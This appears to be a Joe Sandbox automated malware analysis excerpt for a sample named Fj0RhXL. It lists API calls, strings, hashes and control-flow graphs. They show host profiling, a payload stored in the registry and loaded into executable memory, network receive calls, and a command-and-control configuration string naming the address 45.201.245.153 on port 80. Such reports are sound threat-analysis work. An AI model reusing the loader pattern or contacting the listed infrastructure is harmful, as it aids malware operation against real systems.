GetSidSubAuthorityCount GetSidSubAuthority 1658->1663 1659->1640 1660->1639 1664 3d880d6-3d880dc 1660->1664 1661->1640 1662->1648 1663->1662 1664->1643 1665 3d880de-3d880e4 1664->1665 1665->1640
                                          APIs
                                          • GetCurrentProcessId.KERNEL32(75BF73E0), ref: 03D87F94
                                          • wsprintfW.USER32 ref: 03D87FA7
                                            • Part of subcall function 03D87E40: GetCurrentProcessId.KERNEL32(90594F2A,00000000,00000000,75BF73E0,03DB0AC0,000000FF,?,03D87FB3,00000000), ref: 03D87E68
                                            • Part of subcall function 03D87E40: OpenProcess.KERNEL32(00000400,00000000,00000000,?,03D87FB3,00000000), ref: 03D87E77
                                            • Part of subcall function 03D87E40: OpenProcessToken.ADVAPI32(00000000,00000008,?,?,03D87FB3,00000000), ref: 03D87E8D
                                            • Part of subcall function 03D87E40: CloseHandle.KERNEL32(00000000,?,03D87FB3,00000000), ref: 03D87E98
                                          • _memset.LIBCMT ref: 03D87FC2
                                          • GetVersionExW.KERNEL32(?), ref: 03D87FDB
                                          • GetCurrentProcess.KERNEL32(00000008,?), ref: 03D88012
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 03D88019
                                          • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 03D8803F
                                          • GetLastError.KERNEL32 ref: 03D88049
                                          • LocalAlloc.KERNEL32(00000040,?), ref: 03D8805D
                                          • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 03D88085
                                          • GetSidSubAuthorityCount.ADVAPI32 ref: 03D88098
                                          • GetSidSubAuthority.ADVAPI32(00000000), ref: 03D880A6
                                          • LocalFree.KERNEL32(?), ref: 03D880B5
                                          • CloseHandle.KERNEL32(?), ref: 03D880C2
                                          • wsprintfW.USER32 ref: 03D8811B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$Token$CurrentOpen$AuthorityCloseHandleInformationLocalwsprintf$AllocCountErrorFreeLastVersion_memset
                                          • String ID: -N/$NO/$None/%s
                                          • API String ID: 3036438616-3095023699
                                          • Opcode ID: 79ceeb1568f96b46befd07642ba3e2ff121746183226428717e741165c462c9d
                                          • Instruction ID: 80177a772d26dc76b7a34b299a65d4bac12138e0c0f4dcd4c4f0e1b2a699f7d3
                                          • Opcode Fuzzy Hash: 79ceeb1568f96b46befd07642ba3e2ff121746183226428717e741165c462c9d
                                          • Instruction Fuzzy Hash: 1F41C672A00318EFDB25EB60DC89FEF777CEB09B40F444595F64696240EA34E964CB61
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: using Moshier eph.; $ trying Swiss Eph; $ using Moshier Eph; $ using Moshier eph.; $.;C:\Astrolog\$Chiron's ephemeris is restricted to JD %8.1f - JD %8.1f$Interpolated apsides are restricted to JD %8.1f - JD %8.1f$Pholus's ephemeris is restricted to JD %8.1f - JD %8.1f$`Gl$`Gl$barycentric Moshier positions are not supported.$de431.eph$illegal planet number %d.$sun: $xGl
                                          • API String ID: 0-3725435109
                                          • Opcode ID: 5f8ed0227d76365d94e03a4730b9f2cd945df6f7554f2a19142e522a911e8198
                                          • Instruction ID: 235cf55c2957b3cbe65ad3ce5f4ef2ca21ace8336eb71d8d7cda75d93a0188eb
                                          • Opcode Fuzzy Hash: 5f8ed0227d76365d94e03a4730b9f2cd945df6f7554f2a19142e522a911e8198
                                          • Instruction Fuzzy Hash: 31826871905515DADF20AF25DC80BD97B70FB4A328F104799E4E8E69D0EB3289E4CF91
                                          APIs
                                            • Part of subcall function 6C3D24FA: __fsopen.LIBCMT ref: 6C3D2507
                                          • _sprintf.LIBCMT ref: 6C351133
                                            • Part of subcall function 6C371814: _sprintf.LIBCMT ref: 6C37183B
                                            • Part of subcall function 6C371814: MessageBoxA.USER32(?,?,00000030), ref: 6C371850
                                          • _memset.LIBCMT ref: 6C351265
                                          • _memset.LIBCMT ref: 6C351276
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _memset_sprintf$Message__fsopen
                                          • String ID: <!--EndFragment-->$<!--StartFragment -->$ pDl$</body></html>$</font></font>$<font face="Courier">$<html><body>$File %s can not be created.$Version:0.9StartHTML:00000094EndHTML:00010000StartFragment:00000129EndFragment:00010000
                                          • API String ID: 2973518034-3673930028
                                          • Opcode ID: 1ae731d32840ae975ba54c520467e960b9189c1ba0f7b7c9296d11dede91f4d3
                                          • Instruction ID: 161a943f5257d859115e2e8ff8d6a5a4029775620989d963ebca2d5c4f1c5417
                                          • Opcode Fuzzy Hash: 1ae731d32840ae975ba54c520467e960b9189c1ba0f7b7c9296d11dede91f4d3
                                          • Instruction Fuzzy Hash: 14919CB2B09281CBDB10FF66C891C6477F1AB4A308B65053ED5468BE48DB71D898CF97
                                          APIs
                                          • GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000000,00000AD4), ref: 03D89632
                                          • lstrcmpiW.KERNEL32(?,A:\), ref: 03D89666
                                          • lstrcmpiW.KERNEL32(?,B:\), ref: 03D89676
                                          • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 03D896A6
                                          • lstrlenW.KERNEL32(?), ref: 03D896B7
                                          • __wcsnicmp.LIBCMT ref: 03D896CE
                                          • lstrcpyW.KERNEL32(00000AD4,?), ref: 03D89704
                                          • lstrcpyW.KERNEL32(?,?), ref: 03D89728
                                          • lstrcatW.KERNEL32(?,00000000), ref: 03D89733
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStrings__wcsnicmplstrcatlstrlen
                                          • String ID: A:\$B:\
                                          • API String ID: 950920757-1009255891
                                          • Opcode ID: dc280636fddafdef3a6e5214b4381d561d985abde725d01983296a5210872b59
                                          • Instruction ID: 91e1c874adc66930b9a597040a2b9e582422b996528667a9cddf5469b4ddbe44
                                          • Opcode Fuzzy Hash: dc280636fddafdef3a6e5214b4381d561d985abde725d01983296a5210872b59
                                          • Instruction Fuzzy Hash: 95417573A01218DBDB10EFA5DC94AFEB37CEF84710F044599E90AA7244E770EA45CBA4
                                          APIs
                                          • _malloc.LIBCMT ref: 6C3D5DD6
                                            • Part of subcall function 6C3D37D0: __FF_MSGBANNER.LIBCMT ref: 6C3D37E9
                                            • Part of subcall function 6C3D37D0: __NMSG_WRITE.LIBCMT ref: 6C3D37F0
                                            • Part of subcall function 6C3D37D0: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6C3D7A8B,?,00000001,?,?,6C3D7F4A,00000018,6C442E78,0000000C,6C3D7FDA), ref: 6C3D3815
                                          • std::exception::exception.LIBCMT ref: 6C3D5E0B
                                          • std::exception::exception.LIBCMT ref: 6C3D5E25
                                          • __CxxThrowException@8.LIBCMT ref: 6C3D5E36
                                          • IsDebuggerPresent.KERNEL32 ref: 6C3D5EF7
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C3D5F0C
                                          • UnhandledExceptionFilter.KERNEL32(6C3FFF84), ref: 6C3D5F17
                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 6C3D5F33
                                          • TerminateProcess.KERNEL32(00000000), ref: 6C3D5F3A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterProcessUnhandledstd::exception::exception$AllocateCurrentDebuggerException@8HeapPresentTerminateThrow_malloc
                                          • String ID: 0Gl
                                          • API String ID: 2175014196-667178714
                                          • Opcode ID: 7390d96cf474463ae5dc99a544d9b0b327aeae2bbc755232deeab8f44226a3c2
                                          • Instruction ID: 03e79abe941d82983865a660c4fbb394703924fb64301c5af0b5585163a9c151
                                          • Opcode Fuzzy Hash: 7390d96cf474463ae5dc99a544d9b0b327aeae2bbc755232deeab8f44226a3c2
                                          • Instruction Fuzzy Hash: 244171B56023A4DFDF42EF94D448A887FB4FB0A308F10441AE918D7B40DB729A45CFA5
                                          APIs
                                          • GetDriveTypeW.KERNEL32(?,00000000,74DEDF80,75BF73E0), ref: 03D8818B
                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 03D881AA
                                          • _memset.LIBCMT ref: 03D881E1
                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 03D881F4
                                          • swprintf.LIBCMT ref: 03D88239
                                          • swprintf.LIBCMT ref: 03D8824C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: swprintf$DiskDriveFreeGlobalMemorySpaceStatusType_memset
                                          • String ID: %sFree%d Gb $:$@$HDD:%d
                                          • API String ID: 3202570353-3501811827
                                          • Opcode ID: e10e294d7ef92ca692c5798c9660781fb7ab710e61828591986cb5c34d92ddd3
                                          • Instruction ID: d6324e4514c6b11fa91e3c30848ed202ccf041e34d3c375e36e8b7f135b04a2d
                                          • Opcode Fuzzy Hash: e10e294d7ef92ca692c5798c9660781fb7ab710e61828591986cb5c34d92ddd3
                                          • Instruction Fuzzy Hash: B2314FB7D0021C9BDB14DFE5DC85FEEB7B9EB48700F50421DE91AAB241EA746A05CB90
                                          APIs
                                          • CreateDXGIFactory.DXGI(03DB64CC,?,90594F2A,00000000,74DEDF80,75BF73E0), ref: 03D8844A
                                          • swprintf.LIBCMT ref: 03D8861E
                                          • std::_Xinvalid_argument.LIBCPMT ref: 03D886C7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFactoryXinvalid_argumentstd::_swprintf
                                          • String ID: %s%s %d %d $%s%s %d*%d $vector<T> too long
                                          • API String ID: 3803070356-257307503
                                          • Opcode ID: eb57a69883e6c455dd49e2a48c10efc0cb746dbabd5b353b58b86e14e6490d16
                                          • Instruction ID: f97073539c8e7aaf401bd9c0832a4f490d06c8082f6e2ff6a675169a660cecdb
                                          • Opcode Fuzzy Hash: eb57a69883e6c455dd49e2a48c10efc0cb746dbabd5b353b58b86e14e6490d16
                                          • Instruction Fuzzy Hash: 6BE15471E012259FDF24DF28CC81BEEB3B5EB85700F5446E9D94AA7284D770AE819F90
                                          APIs
                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 02EB0730
                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 02EB0768
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3621984576.0000000002EB0000.00000040.00000020.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2eb0000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID: 32.d$Ws2_$ll$ntdl
                                          • API String ID: 4275171209-255390435
                                          • Opcode ID: a39fa57f05982157fdfc5c527494d81ec470d8fdb14a5e7a4e042a38df2f36b4
                                          • Instruction ID: 91e11503b79a7fa7609af6630124859c1e8bc60827e24c233d58de3d21bdb366
                                          • Opcode Fuzzy Hash: a39fa57f05982157fdfc5c527494d81ec470d8fdb14a5e7a4e042a38df2f36b4
                                          • Instruction Fuzzy Hash: CC91A075488340AFD7229F60C844AABBBE1FF88314F14995DF9D986261DB32D908CF53
                                          APIs
                                          • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 02F03013
                                          • recv.WS2_32(?,?,00040000,00000000), ref: 02F03034
                                            • Part of subcall function 02F0721D: __getptd_noexit.LIBCMT ref: 02F0721D
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: __getptd_noexitrecvselect
                                          • String ID:
                                          • API String ID: 4248608111-0
                                          • Opcode ID: e356f88b06e1d33847e323f0afaf8ddacba5afa19e1ba3dce90425abf8776845
                                          • Instruction ID: eada09b3be9cdefd0f9c1221fc670fdded83ceba73ea3e0a47161a45cc53e285
                                          • Opcode Fuzzy Hash: e356f88b06e1d33847e323f0afaf8ddacba5afa19e1ba3dce90425abf8776845
                                          • Instruction Fuzzy Hash: BE21B670E41208DBEB24AF64CCC8F9AB765EF05798F1005D5EB04AB1C4D771A984DFA1

                                          Control-flow Graph

                                          APIs
                                          • _memset.LIBCMT ref: 02F05E61
                                            • Part of subcall function 02F05D50: lstrlenW.KERNEL32(000012A0,?,?,?,?,?,02F05E77,p1:,02F1C6FE,00000000,02F1C6E0,00000000,000012A0,|p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:), ref: 02F05D68
                                            • Part of subcall function 02F05D50: _memset.LIBCMT ref: 02F05D72
                                            • Part of subcall function 02F05D50: lstrlenW.KERNEL32(|p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:,?,?,?,?,?,02F05E77,p1:,02F1C6FE,00000000,02F1C6E0,00000000,000012A0,|p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:), ref: 02F05D7F
                                            • Part of subcall function 02F05D50: lstrlenW.KERNEL32(?,?,?,?,?,?,02F05E77,p1:,02F1C6FE,00000000,02F1C6E0,00000000,000012A0,|p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:), ref: 02F05D87
                                          • RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 02F0600B
                                          • RegQueryValueExW.KERNEL32(?,IpDate,00000000,00000003,00000000,00000000), ref: 02F06030
                                          • _memset.LIBCMT ref: 02F06048
                                          • RegQueryValueExW.ADVAPI32(?,IpDate,00000000,00000003,|p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:,0000000A), ref: 02F06068
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _memsetlstrlen$QueryValue$Open
                                          • String ID: Console$IpDate$bb:$bd:$bh:$bz:$cl:$dd:$dl:$fz:$jp:$kl:$ll:$o1:$o2:$o3:$p1:$p2:$p3:$sh:$sx:$t1:$t2:$t3:$|p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:
                                          • API String ID: 3278200350-4174169328
                                          • Opcode ID: 0cb2b43bee42cba43178b94c3ddf1cf9fe81575194eedf476b4b0bb61644fc3d
                                          • Instruction ID: 2f9e786a5e1aa2e08c2d25b9ed4be3db13e4a55e12f4463c02ff7c9574ba3228
                                          • Opcode Fuzzy Hash: 0cb2b43bee42cba43178b94c3ddf1cf9fe81575194eedf476b4b0bb61644fc3d
                                          • Instruction Fuzzy Hash: 4351B3B0BCA30539F92072A54C9BF4DBB156B21FC4FE00242FB0B791D59AE1B100AD6B

                                          Control-flow Graph

                                          APIs
                                          • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,00020019,?), ref: 02F054F7
                                          • RegQueryValueExW.ADVAPI32(?,d33f351a4aeea5e608853d1a56661059,00000000,00000003,00000000,00000003), ref: 02F0551E
                                          • _memset.LIBCMT ref: 02F05538
                                          • RegQueryValueExW.ADVAPI32(?,d33f351a4aeea5e608853d1a56661059,00000000,00000003,00000000,00000003), ref: 02F05553
                                          • VirtualAlloc.KERNEL32(00000000,00043FBF,00003000,00000040), ref: 02F05576
                                          • RegCloseKey.ADVAPI32(?), ref: 02F055A1
                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02F055F5
                                          • _memset.LIBCMT ref: 02F05659
                                          • _memset.LIBCMT ref: 02F0567D
                                          • _memset.LIBCMT ref: 02F0568F
                                          • VirtualAlloc.KERNEL32(00000000,00043FBF,00003000,00000040), ref: 02F05716
                                          • RegCreateKeyW.ADVAPI32(80000001,Console\0,?), ref: 02F05789
                                          • RegDeleteValueW.KERNEL32(?,d33f351a4aeea5e608853d1a56661059), ref: 02F0579C
                                          • RegSetValueExW.KERNEL32(?,d33f351a4aeea5e608853d1a56661059,00000000,00000003,00000000,00000065), ref: 02F057B4
                                          • RegCloseKey.KERNEL32(?), ref: 02F057BE
                                          • Sleep.KERNEL32(00000BB8), ref: 02F057EE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: Value_memset$Virtual$AllocCloseQuery$CreateDeleteFreeOpenSleep
                                          • String ID: !jWW$.$Console\0$_$bde32d9ec03d5b7fedd304b2f3173b0d$d33f351a4aeea5e608853d1a56661059$e$i$l${vU_
                                          • API String ID: 354323817-214877959
                                          • Opcode ID: 11664f981dbc19fbc7499874d8da43e1e8c3f5772189eb7a59d89f95f9d78db0
                                          • Instruction ID: 191ba9d193196e750bac026b2873510925a150ebab9bf009ecae6716a9162239
                                          • Opcode Fuzzy Hash: 11664f981dbc19fbc7499874d8da43e1e8c3f5772189eb7a59d89f95f9d78db0
                                          • Instruction Fuzzy Hash: 3D91E775E40308AFE720DF60DC85F6ABB7AFB85784F804559FA099B280D7B19A40CF61

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 733 6c3747b5-6c3747e3 734 6c3747e5 733->734 735 6c3747ea-6c37480f call 6c3d1f84 733->735 734->735 738 6c374814-6c37481b 735->738 739 6c37481d-6c374828 738->739 740 6c37482a-6c37482e 738->740 741 6c37483f-6c374873 call 6c3d1f84 GetModuleFileNameA 739->741 742 6c374834-6c37483a 740->742 743 6c374a8f-6c374a91 740->743 751 6c374875-6c374879 741->751 752 6c37488d-6c374890 741->752 742->741 745 6c374a93-6c374a97 743->745 746 6c374ac0-6c374ac7 743->746 748 6c374ae9-6c374af9 call 6c3d1f75 745->748 749 6c374a99-6c374abe call 6c3d1f84 call 6c371814 745->749 746->748 750 6c374ac9-6c374ae6 call 6c3d1f84 call 6c3d28b7 746->750 749->748 750->748 751->751 756 6c37487b 751->756 758 6c374893-6c3748c0 call 6c3d1f84 call 6c3d24fa 752->758 759 6c374892 752->759 762 6c374883-6c37488b 756->762 758->746 773 6c3748c6-6c3748f4 call 6c3d1f84 call 6c3d24fa 758->773 759->758 762->752 767 6c37487d-6c374880 762->767 767->759 770 6c374882 767->770 770->762 773->746 778 6c3748fa 773->778 779 6c3748ff-6c374903 778->779 780 6c374905-6c374908 779->780 781 6c374941-6c37494a 779->781 780->781 782 6c37490a-6c37493b call 6c3d1f84 call 6c3d24fa 780->782 781->779 783 6c37494c-6c374979 call 6c3d1f84 call 6c3d330e 781->783 782->746 782->781 792 6c3749b7-6c3749c4 call 6c3d330e 783->792 793 6c37497b-6c37497e 783->793 799 6c3749c6-6c3749c9 792->799 800 6c374a02-6c374a0b call 6c3d330e 792->800 793->792 794 6c374980-6c3749b1 call 6c3d1f84 call 6c3d24fa 793->794 794->746 794->792 799->800 803 6c3749cb-6c3749fc call 6c3d1f84 call 6c3d24fa 799->803 807 6c374a45-6c374a6e call 6c3d1f84 call 6c3d24fa 800->807 808 6c374a0d-6c374a10 800->808 803->746 803->800 819 6c374a73-6c374a7a 807->819 808->807 810 6c374a12-6c374a43 call 6c3d1f84 call 6c3d24fa 808->810 810->746 810->807 819->746 821 6c374a7c-6c374a89 819->821 821->738 821->743
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _sprintf$__wgetenv$FileModuleName
                                          • String ID: %s%c%s$%s%s$%s.as$710$ASTR$ASTROLOG$C:\Astrolog$File '%s' not found.$r%s
                                          • API String ID: 2614078948-576927601
                                          • Opcode ID: 45dab5c7261fa94849f895a5f436dfed9cb96850da78900b9b87a62cd1e4444a
                                          • Instruction ID: 31779d9beaced4ceb37dd2d80cae306bf9c4f83ed2200a0b6fbeb59ed78145bb
                                          • Opcode Fuzzy Hash: 45dab5c7261fa94849f895a5f436dfed9cb96850da78900b9b87a62cd1e4444a
                                          • Instruction Fuzzy Hash: 3D91B5F680025CABDF21DB94CD44FDB73BC9B14314F0501E1E699A3941EB79EA888F65

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
